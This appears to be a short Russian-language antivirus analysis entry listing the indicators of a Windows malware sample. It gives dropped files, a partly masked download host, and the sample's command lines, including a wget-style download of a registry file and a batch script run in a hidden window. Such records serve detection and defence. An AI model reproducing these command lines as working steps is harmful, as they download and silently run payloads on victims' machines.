Техническая информация
- %TEMP%\$inst\2.tmp
- %TEMP%\$inst\temp_0.tmp
- %WINDIR%\s.txt
- %WINDIR%\w\libeay32.dll
- %WINDIR%\w\libiconv2.dll
- %WINDIR%\w\libintl3.dll
- %WINDIR%\w\libssl32.dll
- %WINDIR%\w\w.exe
- %WINDIR%\c\cu.exe
- %WINDIR%\n.exe
- %WINDIR%\test12.bat
- %WINDIR%\mt.reg
- %TEMP%\$inst\temp_0.tmp
- %TEMP%\$inst\2.tmp
- http://c8##8.host/mt.reg
- DNS ASK c8##8.host
- '%WINDIR%\w\w.exe' -c -P "%WINDIR%" "http://c8##8.host/mt.reg" --referer="0101010010"
- '%WINDIR%\syswow64\cmd.exe' /c ""%WINDIR%\test12.bat" "' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c ""%WINDIR%\test12.bat" "